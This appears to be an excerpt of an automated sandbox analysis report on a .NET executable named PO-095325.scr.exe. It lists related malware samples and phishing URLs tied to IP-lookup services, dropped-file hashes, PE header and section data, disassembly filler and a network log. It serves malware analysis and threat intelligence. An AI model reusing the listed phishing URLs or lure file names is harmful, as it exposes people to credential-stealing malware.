| 208.95.112.1 | New Voicemail_Daiichi-Sankyo.html | malicious | HTMLPhisher | ip-api.com/json/?fields=status,country,regionName,city,query |
| 208.95.112.1 | DHL.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting |
| 208.95.112.1 | KjCBSM7Ukv.exe | malicious | PureLog Stealer, XWorm | ip-api.com/line/?fields=hosting |
| 208.95.112.1 | eO2bqORIJb.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting |
| 208.95.112.1 | SecuriteInfo.com.Win64.Evo-gen.10533.31255.exe | malicious | Unknown | ip-api.com/json |
| 208.95.112.1 | 13w4NM6mPa.exe | malicious | LummaC | ip-api.com/json |
| 208.95.112.1 | mdWXrbOxsY.exe | malicious | Xehook Stealer | ip-api.com/line/?fields=hosting |
| 208.95.112.1 | mdWXrbOxsY.exe | malicious | Xehook Stealer | ip-api.com/line/?fields=hosting |
| 104.26.12.205 | Sky-Beta.exe | malicious | Stealit | api.ipify.org/?format=json |
| 104.26.12.205 | SecuriteInfo.com.Backdoor.Win32.Agent.myuuxz.13708.17224.exe | malicious | Bunny Loader | api.ipify.org/ |
| 104.26.12.205 | lods.cmd | malicious | Remcos | api.ipify.org/ |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| --- | --- | --- | --- | --- |
| ip-api.com | Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbs | malicious | AgentTesla, GuLoader | 208.95.112.1 |
| ip-api.com | REMITTANCE COPY.exe | malicious | AgentTesla | 208.95.112.1 |
| ip-api.com | New Voicemail_Daiichi-Sankyo.html | malicious | HTMLPhisher | 208.95.112.1 |
| ip-api.com | DHL.exe | malicious | AgentTesla | 208.95.112.1 |
| ip-api.com | KjCBSM7Ukv.exe | malicious | PureLog Stealer, XWorm | 208.95.112.1 |
| ip-api.com | eO2bqORIJb.exe | malicious | AgentTesla | 208.95.112.1 |
| ip-api.com | SecuriteInfo.com.Win64.Evo-gen.10533.31255.exe | malicious | Unknown | 208.95.112.1 |
| ip-api.com | 13w4NM6mPa.exe | malicious | LummaC | 208.95.112.1 |
| ip-api.com | mdWXrbOxsY.exe | malicious | Xehook Stealer | 208.95.112.1 |
| ip-api.com | mdWXrbOxsY.exe | malicious | Xehook Stealer | 208.95.112.1 |
| api.ipify.org | Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbs | malicious | AgentTesla, GuLoader | 172.67.74.152 |
| api.ipify.org | eOU2MVDmTd.exe | malicious | CredGrabber, Meduza Stealer, PureLog Stealer, zgRAT | 172.67.74.152 |
| api.ipify.org | Receipt_032114005.exe | malicious | AgentTesla, PureLog Stealer | 104.26.13.205 |
| api.ipify.org | eO2bqORIJb.exe | malicious | AgentTesla | 104.26.12.205 |
| api.ipify.org | avp.msi | malicious | Unknown | 104.26.12.205 |
| api.ipify.org | https://cvn7.sa.com/invoice.html?app= | malicious | HTMLPhisher | 172.67.74.152 |
| api.ipify.org | TiKj3IVDj4.exe | malicious | Mint Stealer | 104.26.13.205 |
| api.ipify.org | TiKj3IVDj4.exe | malicious | Mint Stealer | 104.26.12.205 |
| api.ipify.org | KZWCMNWmmqi9lvI.exe | malicious | AgentTesla | 104.26.12.205 |
| api.ipify.org | Payment.exe | malicious | AgentTesla, PureLog Stealer, RedLine | 104.26.13.205 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| --- | --- | --- | --- | --- |
| CLOUDFLARENETUS | https://docx-nok.online/ | malicious | HtmlDropper, HTMLPhisher | 172.67.179.148 |
| CLOUDFLARENETUS | https://download-myproposal.xyz | malicious | HtmlDropper, HTMLPhisher | 104.17.2.184 |
| CLOUDFLARENETUS | SenPalia.exe | malicious | Unknown | 172.64.41.3 |
| CLOUDFLARENETUS | Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbs | malicious | AgentTesla, GuLoader | 172.67.74.152 |
| CLOUDFLARENETUS | https://royaltattoo.in/js/kalexander@yourlawyer.com | malicious | Phisher | 104.17.25.14 |
| CLOUDFLARENETUS | SenPalia.exe | malicious | Unknown | 104.21.7.115 |
| CLOUDFLARENETUS | ppop_verification_request.zip | malicious | Unknown | 162.159.61.3 |
| CLOUDFLARENETUS | https://www.dropbox.com/l/scl/AADwcgxTbjuvzakz6kszZMzP6RXavhxhixQ | malicious | HTMLPhisher | 172.64.150.44 |
| CLOUDFLARENETUS | eOU2MVDmTd.exe | malicious | CredGrabber, Meduza Stealer, PureLog Stealer, zgRAT | 172.67.74.152 |
| CLOUDFLARENETUS | https://cosantinexi.com/ | malicious | HtmlDropper, HTMLPhisher | 104.17.2.184 |
| TUT-ASUS | Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbs | malicious | AgentTesla, GuLoader | 208.95.112.1 |
| TUT-ASUS | REMITTANCE COPY.exe | malicious | AgentTesla | 208.95.112.1 |
| TUT-ASUS | New Voicemail_Daiichi-Sankyo.html | malicious | HTMLPhisher | 208.95.112.1 |
| TUT-ASUS | DHL.exe | malicious | AgentTesla | 208.95.112.1 |
| TUT-ASUS | KjCBSM7Ukv.exe | malicious | PureLog Stealer, XWorm | 208.95.112.1 |
| TUT-ASUS | eO2bqORIJb.exe | malicious | AgentTesla | 208.95.112.1 |
| TUT-ASUS | SecuriteInfo.com.Win64.Evo-gen.10533.31255.exe | malicious | Unknown | 208.95.112.1 |
| TUT-ASUS | 13w4NM6mPa.exe | malicious | LummaC | 208.95.112.1 |
| TUT-ASUS | mdWXrbOxsY.exe | malicious | Xehook Stealer | 208.95.112.1 |
| TUT-ASUS | mdWXrbOxsY.exe | malicious | Xehook Stealer | 208.95.112.1 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| --- | --- | --- | --- | --- |
| 3b5074b1b5d032e5620f69f9f700ff0e | Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbs | malicious | AgentTesla, GuLoader | 104.26.12.205 |
| 3b5074b1b5d032e5620f69f9f700ff0e | W4tW72sfAD.exe | malicious | DCRat, PureLog Stealer, zgRAT | 104.26.12.205 |
| 3b5074b1b5d032e5620f69f9f700ff0e | http://www.sushi-idea.com | malicious | Unknown | 104.26.12.205 |
| 3b5074b1b5d032e5620f69f9f700ff0e | Receipt_032114005.exe | malicious | AgentTesla, PureLog Stealer | 104.26.12.205 |
| 3b5074b1b5d032e5620f69f9f700ff0e | DHL.exe | malicious | AgentTesla | 104.26.12.205 |
| 3b5074b1b5d032e5620f69f9f700ff0e | eInvoicing_pdf.vbs | malicious | FormBook | 104.26.12.205 |
| 3b5074b1b5d032e5620f69f9f700ff0e | KjCBSM7Ukv.exe | malicious | PureLog Stealer, XWorm | 104.26.12.205 |
| 3b5074b1b5d032e5620f69f9f700ff0e | eO2bqORIJb.exe | malicious | AgentTesla | 104.26.12.205 |
| 3b5074b1b5d032e5620f69f9f700ff0e | SecuriteInfo.com.Program.Unwanted.5412.9308.3353.exe | malicious | PureLog Stealer | 104.26.12.205 |
| 3b5074b1b5d032e5620f69f9f700ff0e | SecuriteInfo.com.Trojan.KillProc2.23108.29569.31585.exe | malicious | Unknown | 104.26.12.205 |
                                                                      No context
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 8192
Entropy (8bit): 0.3588072191296206
Encrypted: false
SSDEEP: 6:6xkoaaD0JOCEfMuaaD0JOCEfMKQmDhxkoaaD0JOCEfMuaaD0JOCEfMKQmD:maaD0JcaaD0JwQQ3aaD0JcaaD0JwQQ
MD5: 663C5D6018506231E334FB3EA962ED1C
SHA1: 539A4641CE92E57E4ADEE32750A817326E596D4C
SHA-256: 066CB701C03237D2612AA647E6BF08EF594360F96E433639B0CC9EED7335F1E1
SHA-512: 5F910653FD1B12B94D314EDEDF6EB2BEC70D369D921EB5B7CF4D199B0374D6C798336E39DBF2781F3B0457280E0DDA63BDF4861DF31C08152544B0F1039D5FCD
Malicious: false
Reputation: moderate, very likely benign file
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 0.8337620509765368
Encrypted: false
SSDEEP: 1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDug2:gJjJGtpTq2yv1AuNZRY3diu8iBVqF0
MD5: C603912FDC208B0932A9A12D07C47150
SHA1: BA2027AC357C1B4E3271D4B2AE0B22EDAFB77495
SHA-256: A60DF974F14AE3DBFB2C6F1FBC316849E994FA880AB73F968F89CE9F89D11D3A
SHA-512: E4883A838C8DD48AFB6CDD1C487DC74EA0B7C4A23E6D74A0BAF7736C4D3E48427B951E632D4793A1EFEEA63DE752CE0506BCFDC45B3D1689AC86FB2405A96E7F
Malicious: false
Reputation: low
                                                                      Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0xf6d8adac, page size 16384, Windows version 10.0
                                                                      Category:dropped
                                                                      Size (bytes):1310720
                                                                      Entropy (8bit):0.6584532953534723
                                                                      Encrypted:false
                                                                      SSDEEP:1536:RSB2ESB2SSjlK/AxrO1T1B0CZSJWYkr3g16n2UPkLk+kdbI/0uznv0M1Dn/didMV:Raza6xhzA2U8HDnAPZ4PZf9h/9h
                                                                      MD5:E8B87D35C32807784E47D5D4F49514D2
                                                                      SHA1:0014112860192B2C8E69620EE74F33C4CAC5691F
                                                                      SHA-256:D6865E96624B97ED51DB1D987C57F780B22712C199C9295CB9610D0F0ACEE7CE
                                                                      SHA-512:BF691ECDF0BB5B8BA8099C838974CBBDE1841BD7E92A89F245146393C2C14FB52BD9E0A5BC59C5816E4267D64CCD92E0146AFA3272CBDBB37EB613CBF13DAF9A
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:...... ...............X\...;...{......................T.~..........|..;....|..h.|..........|..T.~.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{..................................>.q.....|....................i.....|...........................#......T.~.....................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):16384
                                                                      Entropy (8bit):0.0799903774938407
                                                                      Encrypted:false
                                                                      SSDEEP:3:yc1OetYepGwVNP6LhZnqG4lltknZoll58Kgvvl/QoeP/ll:yUrzpvU/q1lUnCz8KgR+t
                                                                      MD5:F0314870666DEDF32912D27F41F6D3C9
                                                                      SHA1:FFC47EA63C4B4427BEB6F78CF858001BED1BF592
                                                                      SHA-256:FE6DAEAF1B291EDCC0B97E15179D83E7CA75ABC7A12703887ABCF4D1F654EFAC
                                                                      SHA-512:8113400FE49DDABAD7060AEA12F7E2A2B6DDF18487ADD374B86ADA6CC955E87CF3D22EAA76C9888F0C7038EA7B87750A18D16AFB96131F30B77F57A45DA9725D
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:.9.......................................;...{..;....|.......|...............|.......|...g.F.....|.....................i.....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Users\user\Desktop\PO-095325.scr.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1216
                                                                      Entropy (8bit):5.34331486778365
                                                                      Encrypted:false
                                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                      Malicious:false
                                                                      Reputation:high, very likely benign file
                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):64
                                                                      Entropy (8bit):1.1510207563435464
                                                                      Encrypted:false
                                                                      SSDEEP:3:NlllulTkklh:NllUokl
                                                                      MD5:8F489B5B8555D6E9737E8EE991AA32FD
                                                                      SHA1:05B412B1818DDB95025A6580D9E1F3845F6A2AFC
                                                                      SHA-256:679D924F42E8FC107A7BE221DE26CCFEBF98633EA2454D3B4E0D82ED66E3E03D
                                                                      SHA-512:97521122A5B64237EF3057A563284AC5C0D3354E8AC5AA0DE2E2FA61BA63379091200D1C4A36FABC16B049E83EF11DBB62E1987A6E4D6A4BCD5DDB27E7BD9F49
                                                                      Malicious:false
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview:@...e................................................@..........
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Reputation:high, very likely benign file
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):55
                                                                      Entropy (8bit):4.306461250274409
                                                                      Encrypted:false
                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                      Malicious:false
                                                                      Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Entropy (8bit):7.5999537682362295
                                                                      TrID:
                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                      File name:PO-095325.scr.exe
                                                                      File size:578'048 bytes
                                                                      MD5:93f87d1e11c67dbc47ff98369811e826
                                                                      SHA1:b407b411806659a874ce20d38b62c891703a4bce
                                                                      SHA256:16043cbb08a362ab425145ded9447bcc382c2b9c9eb3b570704edabbe4276fea
                                                                      SHA512:efec7ded450a9c5bd8aa5de3b7f30a0df3af003303f4f394c6e9169c0c851f882e51c357c8a865acb9084f05b7d112c50f6d8af756be7e1c4362d3ff9721a218
                                                                      SSDEEP:6144:adD9YbLuzSyYVeYrmsmERAOU4CmhqQ+cIxJF33hnaoSGCjc/PmKFDq90h5VWSD2w:arrAwXdERU4LxBUzAVc/PmKe0D
                                                                      TLSH:21C4AFC2309455D6E86A44F1BC09DCA039EB35AFD6B2A98DBA97D61FC0A3313051B53F
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....3...............0..j...f........... ........@.. .......................@............@................................
                                                                      Icon Hash:0819111189111919
                                                                      Entrypoint:0x4588de
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0xC933C395 [Sat Dec 19 14:13:41 2076 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                      Instruction
                                                                      jmp dword ptr [00402000h]
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                       Name                                  Virtual Address  Virtual Size  Is in Section
                                                                       IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                                       IMAGE_DIRECTORY_ENTRY_IMPORT          0x58884          0x57          .text
                                                                       IMAGE_DIRECTORY_ENTRY_RESOURCE        0x5a000          0x362ee       .rsrc
                                                                       IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                                       IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                                       IMAGE_DIRECTORY_ENTRY_BASERELOC       0x92000          0xc           .reloc
                                                                       IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                                                       IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                                       IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                                       IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                                       IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                                       IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                                       IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                                                                       IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                                       IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                                                                       IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x20000x568e40x56a00a4bb84d82684373ba869857a2fe221edFalse0.9098941423160173data7.959717171479094IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      .rsrc0x5a0000x362ee0x36400049d770c06acafd72ecb8dba71c6d875False0.47095514112903225data6.3453512496293625IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .reloc0x920000xc0x200497fa2e8416b1e8c83a0f66cefe8d96dFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                      RT_ICON0x5a2b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 4724 x 4724 px/m0.3980496453900709
                                                                      RT_ICON0x5a7180x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 4724 x 4724 px/m0.4110655737704918
                                                                      RT_ICON0x5b0a00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 4724 x 4724 px/m0.3946998123827392
                                                                      RT_ICON0x5c1480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 4724 x 4724 px/m0.34937759336099583
                                                                      RT_ICON0x5e6f00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 4724 x 4724 px/m0.32605101558809635
                                                                      RT_ICON0x629180x5488Device independent bitmap graphic, 72 x 144 x 32, image size 20736, resolution 4724 x 4724 px/m0.30873382624768947
                                                                      RT_ICON0x67da00x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864, resolution 4724 x 4724 px/m0.2748843809123397
                                                                      RT_ICON0x712480x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 4724 x 4724 px/m0.2540222406246303
                                                                      RT_ICON0x81a700xe32bPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced1.0004470810764337
                                                                      RT_GROUP_ICON0x8fd9c0x84data0.7121212121212122
                                                                      RT_VERSION0x8fe200x2e4data0.4391891891891892
                                                                      RT_MANIFEST0x901040x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                      DLLImport
                                                                      mscoree.dll_CorExeMain
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 19, 2024 17:13:59.913619041 CEST | 49707 | 443 | 192.168.2.5 | 104.26.12.205
Apr 19, 2024 17:13:59.913671017 CEST | 443 | 49707 | 104.26.12.205 | 192.168.2.5
Apr 19, 2024 17:13:59.913741112 CEST | 49707 | 443 | 192.168.2.5 | 104.26.12.205
Apr 19, 2024 17:13:59.920380116 CEST | 49707 | 443 | 192.168.2.5 | 104.26.12.205
Apr 19, 2024 17:13:59.920397043 CEST | 443 | 49707 | 104.26.12.205 | 192.168.2.5
Apr 19, 2024 17:14:00.155541897 CEST | 443 | 49707 | 104.26.12.205 | 192.168.2.5
Apr 19, 2024 17:14:00.155647993 CEST | 49707 | 443 | 192.168.2.5 | 104.26.12.205
Apr 19, 2024 17:14:00.160696983 CEST | 49707 | 443 | 192.168.2.5 | 104.26.12.205
Apr 19, 2024 17:14:00.160716057 CEST | 443 | 49707 | 104.26.12.205 | 192.168.2.5
Apr 19, 2024 17:14:00.161117077 CEST | 443 | 49707 | 104.26.12.205 | 192.168.2.5
Apr 19, 2024 17:14:00.204627037 CEST | 49707 | 443 | 192.168.2.5 | 104.26.12.205
Apr 19, 2024 17:14:00.264291048 CEST | 49707 | 443 | 192.168.2.5 | 104.26.12.205
